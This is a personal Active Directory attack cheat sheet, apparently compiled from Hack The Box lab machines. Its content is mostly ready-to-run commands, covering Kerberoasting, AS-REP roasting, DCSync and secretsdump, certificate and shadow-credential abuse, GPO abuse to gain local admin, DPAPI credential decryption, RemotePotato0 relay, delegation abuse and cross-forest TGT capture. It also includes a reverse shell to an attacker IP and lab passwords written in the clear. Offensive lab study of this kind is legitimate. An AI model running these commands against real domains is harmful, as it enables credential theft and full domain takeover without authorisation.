Active Directory

ADCS

• tool - certipy

• Reference article - certified-pre-owned

• to find whether the domain controller is vulnerable or not

certipy find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -target 10.10.11.222 -text -stdout -vulnerable

OR

certipy find -u svc_ldap -hashes :<HASH> -target 10.10.11.222 -text -stdout -vulnerable

ASREProast

GetNPUsers.py 'BLACKFIELD.LOCAL/' -usersfile user.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.192

impacket-GetNPUsers dante/jbercov -no-pass -dc-ip 172.16.2.5 

DCSync

impacket-secretsdump DANTE.ADMIN/jbercov:myspace7@172.16.2.5

Kerberoasting

└─$ impacket-GetUserSPNs -request -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd' 

OR

└─$ netexec ldap tombwatcher.htb -u henry -p 'H3nry_987TGV!' --kerberoasting kerberoast.txt

getTGT

• If we have the valid credentials, we can forge the ticket and get the shell

└─$ impacket-getTGT frizz.htb/'f.frizzle':'<PASSWORD>' -dc-ip 10.10.11.60  

└─$ export KRB5CCNAME=f.frizzle.ccache

└─$ klist

└─$ evil-winrm -i 10.10.11.60 -k f.frizzle.ccache -r frizz.htb
└─$ evil-winrm -r rustykey.htb -i dc.rustykey.htb

GPO Abuse

Check if we are the members of the Group Policy Creator Owners via whoami /groups

Now we have to use SharpGPOAbuse to add us to the administrator group, and for that, we need to

• Create a GPO named pain.

• Link it to the DOMAIN CONTROLLERS organisational unit in the FRIZZ.HTB domain.

• Make sure the link is enabled so that the GPO takes effect on all objects within the OU (ie, domain controllers).

PS C:\Users\M.SchoolBus> New-GPO -Name "TestGPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName TestGPO
PS C:\Users\M.SchoolBus> gpupdate /force                     

# Either logoff and login or start new session
PS C:\Users\M.SchoolBus> .\RunasCs.exe M.SchoolBus <PASSWORD> cmd.exe -r 10.10.16.7:1234

Shadow Credential

• If we have GenericAll on a target user, we can

└─$ certipy shadow auto -account '<TARGET USER>' -u '<CONTROLED USRNAME>@DOMAIN.lOCAL' -p '<PASSWORD>' -dc-ip 10.129.13.255

OR

└─$ certipy shadow auto -account '<TARGET USER>' -u '<CONTROLED USRNAME>@DOMAIN.lOCAL' -hashes <HASH> -dc-ip 10.129.13.255

Tombstone

• to check for deleted object (reference)

Get-ADObject -Filter {isDeleted -eq $True -and name -ne "Deleted Objects"} -IncludeDeletedObjects -Properties *

• To Restore

Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"

• via bloodyAD

#to search for deleted object
└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get search -c 1.2.840.113556.1.4.417 --filter '(isDeleted=TRUE)' --attr lastKnownParent,msDS-LastKnownRDN,sAMAccountName

#to check if we have the write perimission over deletred object
└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get search -c 1.2.840.113556.1.4.417 --filter '(isDeleted=TRUE)' --attr ntsecuritydescriptor --resolve-sd

#Retore
└─$ bloodyAD --host DC.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb

GMSA

• to get the password if we have read permission

└─$ netexec ldap 10.10.11.61 -u mark.adams  -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa

• TO check and set the read permission

#to check
Get-ADServiceAccount -Identity "Haze-IT-Backup$" -Properties PrincipalsAllowedToRetrieveManagedPassword

#to set the read permission to our user
Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"

Timeroasting

There is a white paper for TimeRoasting (refer to this), and this git repo

└─$ python3 timeroast.py 10.129.60.209

Writable Registry

We can use the below script to check for writable registry keys under HKLM:\SOFTWARE

Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
    try {
        $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
        $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
        $regKey.SetValue('TestWrite','1')
        $regKey.DeleteValue('TestWrite')
        $true
    } catch {
        $false
    }
}

If a non-admin user can write to a registry key under HKLM, it might allow:

• Persistence (e.g., via startup or service hijacking)

• Privilege escalation (e.g., by modifying how a privileged app or service behaves)

• DLL hijacking or COM hijacking

Parsing DPAPI from user's home directory

DPAPI masterkeys are generally stored in the following directories:

• %HOME%\AppData\Roaming\Microsoft\Protect\<UserSID>\

• %HOME%\AppData\Local\Microsoft\Protect\<UserSID>\

Once we have the masterkey file, we need the encrypted blobs, generally found in the following directories:

• %HOME%\AppData\Roaming\Microsoft\Credentials\

• %HOME%\AppData\Local\Microsoft\Credentials\

After downloading these files, we can use impacket's dpapi.py to decrypt the masterkey and decrypt the blob:

└─$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110

└─$ impacket-dpapi credential -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 -file 772275FAD58525253490A9B0039791D3 

if not able to download the key or credentials, try to base64 encode it

[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\users\c.neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847'))

NTLMv2 response

privilege escalation via NTLM relay using RemotePotato0, targeting a user who is actively logged in to the system

• First, we need to upgrade our evil-winrm session to an interactive session. This way, we'll obtain more enumeration capabilities(using RunasC.exe)

• We can see in our groups we now are in NT AUTHORITY\INTERACTIVE

C:\Windows\system32>qwinsta

• We can see the abc user is connected to the box with session ID x

• We can use an universal no fix exploit allowing to retrieve the NTLMv2 response of this user called RemotePotato0.exe:

#on our machine
└─$ socat -v TCP-LISTEN:135,fork,reuseaddr TCP:$BOX_IP:9999 

#on box
PS C:\temp> .\RemotePotato0.exe -m 2 -s 1 -x $OUR_IP

ExecuteDCOM

└─$ impacket-dcomexec -silentcommand -object MMC20 '$LOCAL.DOMAIN/$USER:$PASS@$DCIP' 'ping $IP'

AllowedToDelegate

#get the tgt which has rights 
*Evil-WinRM* PS C:\temp> .\Rubeus asktgt /user:blake /password:P@ssw0rd@123 /domain:painters.htb /outfile:ticket.kirbi

#now to impersonate via ticket
*Evil-WinRM* PS C:\temp> .\Rubeus s4u /ticket:ticket.kirbi /msdsspn:CIFS/dc.painters.htb /impersonateuser:DC$ /domain:painters.htb /altservice:CIFS,HOST,LDAP /ptt

Backup Operators

there are two ways

• https://github.com/giuliano108/SeBackupPrivilege

• https://github.com/mpgn/BackupOperatorToDA

UnPAC-the-hash

iIn environments with PKI, we can use the UnPAC the hash - it lets us extract the NThash of the current user.

We need to request a certificate in the current context. The User template is usually enabled, and Domain Users can enroll on it. Certify can accomplish all that. We need to find the CA first:

PS C:\temp> .\Certify.exe cas                                               

When no template is specified, the User template gets used by default:

Using User template because

• pkiextendedkeyusage contains Client Authentication

• Enrollment Rights contains Domain Users

PS C:\temp> .\Certify.exe request /ca:DC02.darkzero.ext\darkzero-ext-DC02-CA

we need to copy out the certificate to our machine and convert it to PFX format:

└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Rubeus can now UnPAC the hash:

PS C:\temp> .\Rubeus.exe asktgt /getcredentials /certificate:C:\temp\cert.pfx /user:svc_sql

Interdomain trust - Unconstrained Delegation - Coercion

CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION should be there

Domain Controllers have unconstrained delegation enabled by default, which is also the case here.

Before 2019, it was possible to bypass forests as a security boundary with unconstrained delegation, but not anymore.

However, with the EnableTGTDelegation, this attack can be revived.

Let Rubeus.exe monitor and capture TGTs, while we coerce the DC01 in the darkzero.htb domain to connect to DC02 in the darkzero.ext domain.

C:\temp>.\Rubeus.exe monitor /interval:5 /nowrap

We can use xp_dirtree (if MSSQL is there) or MS-RPRN.exe or any other for coercion

└─$ impacket-mssqlclient 'darkzero.htb'/'john.w':'RFulUtONCOL!'@10.129.245.186 -windows-auth -command 'xp_dirtree \\DC02.darkzero.ext\test\'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
SQL> xp_dirtree \\DC02.darkzero.ext\test\
subdirectory   depth   file   
------------   -----   ----   

If the coercion was successful and DC01$'s TGT was dumped

After base64 decryption and conversion from .kirbi to .ccache, it can be used for DCSync:

┌──(anurag㉿anurag)-[~/htb/DarkZero]
└─$ cat tgt.b64 | base64 -d > DC01.kirbi
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/DarkZero]
└─$ impacket-ticketConverter DC01.kirbi DC01.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

┌──(anurag㉿anurag)-[~/htb/DarkZero]
└─$ export KRB5CCNAME=DC01.ccache                                               
                                                                                                                                                                                                                                                                           
┌──(anurag㉿anurag)-[~/htb/DarkZero]
└─$ impacket-secretsdump darkzero.htb/'DC01$'@DC01.darkzero.htb -no-pass -k -just-dc